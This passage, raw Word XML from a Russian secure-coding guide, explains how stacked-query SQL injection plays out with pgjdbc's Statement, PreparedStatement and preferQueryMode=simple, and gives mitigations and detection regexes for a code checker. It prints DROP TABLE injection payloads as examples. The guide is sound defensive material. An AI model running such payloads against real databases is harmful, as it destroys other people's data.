    <w:p w14:paraId="0757C312"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4CE3410F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Оба statement-а исполняются. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>executeQuery()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вернёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ResultSet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от первого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (JDBC: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getMoreResults()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> даст доступ к последующим командам, но обычно не вызывается).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4543CD24" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Путь 2: PreparedStatement + extended (default) — Parse error на `;` в SQL-тексте.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5521BF1C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если разработчик правильно использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>setString()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — payload едет как Bind-параметр:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAD77A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Parse:   SELECT id, email FROM users WHERE name = $1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD328E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bind:    $1 = 'x''; DROP TABLE users; --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED47EA8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Execute: 0 rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290BC5FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Если разработчик случайно склеил SQL-текст с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B6E495" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PreparedStatement ps = conn.prepareStatement(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6BFD05" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "SELECT id; DROP TABLE users");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD6A14C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Сервер отвечает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F6E3CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>org.postgresql.util.PSQLException: ERROR: cannot insert multiple commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618E5822" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>into a prepared statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD80BC3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Путь 3: PreparedStatement + `preferQueryMode=simple` — частичная защита.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7747F188" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>JDBC URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E09E95E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>jdbc:postgresql://host:5432/db?preferQueryMode=simple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4A7178" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">С таким URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PreparedStatement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>setString()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> остаётся безопасным благодаря </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>client-side экранированию pgjdbc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (аналогично psycopg2). Но конкатенация в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prepareStatement(sql)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> теперь проходит как simple query — стакинг исполнится. То есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>preferQueryMode=simple</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> снимает серверную защиту, оставляя только клиентскую — и она работает только для значений-через-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t>, не для всей SQL-строки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEFFCE2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Что отличает pgjdbc от Python-драйверов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C54058" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Два API на одном connection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Statement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (всегда уязвим к stacked queries при конкатенации) vs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PreparedStatement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (безопасен по умолчанию). В Python-драйверах нет такого разделения — там один </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>execute()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с разными формами вызова.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A424C6F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`preferQueryMode` — connection-wide</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, задаётся в URL. Невозможно «локально» переключить режим для одного запроса. Включение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>simple</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> влияет на всё приложение.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7AF757" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server-side prepared statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> включаются после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prepareThreshold</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исполнений — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PreparedStatement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> становится named prepared statement на сервере. Это усиливает гарантию extended-path, но не меняет картину для stacked queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146FCD94" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`getMoreResults()` API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — JDBC позволяет приложению явно получать результаты нескольких statement-ов после удачного стакинга. Это значит, что разработчик, использующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Statement.execute()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для административных multi-statement скриптов, может видеть все результаты — стакинг здесь не «прячется», как в asyncpg.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202E5BBE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Mitigations специфичные для драйвера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D824B9C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Никогда</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не передавать пользовательский ввод в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Statement.execute*()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Для legitimate multi-statement миграций — отдельный admin-путь, не из HTTP-обработчиков. В коде судьи: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Statement.execute*\(.*\+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>createStatement\(\).*execute*\(.*\+</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9B735D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Всегда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PreparedStatement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>setXxx()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Конкатенация имени таблицы/колонки в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prepareStatement(sql)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — отдельная угроза (см. 3.16); pgjdbc не имеет API для безопасной композиции identifiers, нужна валидация по whitelist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A5B2DE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Не устанавливать `preferQueryMode=simple`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без явной причины. Этот режим существует для совместимости с PgBouncer в transaction-pooling mode и для отладки; в production-коде с пользовательским вводом он снимает один слой защиты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CBC0B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Установить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на уровне роли (GUC) — ограничивает урон от удачного </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DROP TABLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через стакинг (статически — DDL отработает мгновенно, помогает только для медленных payload-ов).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAC4288" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В коде судьи дополнительно: проверка JDBC URL в конфигах на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>preferQueryMode=simple</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как warning, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>createStatement\(\)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с последующей конкатенацией в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>executeQuery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61813B63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D03908" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   pgjdbc ≥ 9.4 (2014) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>preferQueryMode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> появился, default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>extended</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. До 9.4 драйвер всегда использовал extended для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PreparedStatement</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1028A93F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   pgjdbc 42.x — стабильная LTS-ветка, поведение по теме не менялось.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F1985A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PreparedStatement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> существует со старта JDBC (1997).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096E6C98" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C48CA07" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   pgjdbc API: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PreferQueryMode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://jdbc.postgresql.org/documentation/publicapi/org/postgresql/jdbc/PreferQueryMode.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7B51F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   pgjdbc docs: «Connecting to the Database» (URL parameters) — https://jdbc.postgresql.org/documentation/use/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79043CC8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   JDBC API: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Statement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PreparedStatement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://docs.oracle.com/javase/tutorial/jdbc/basics/prepared.html</w:t>
      </w:r>
    </w:p>
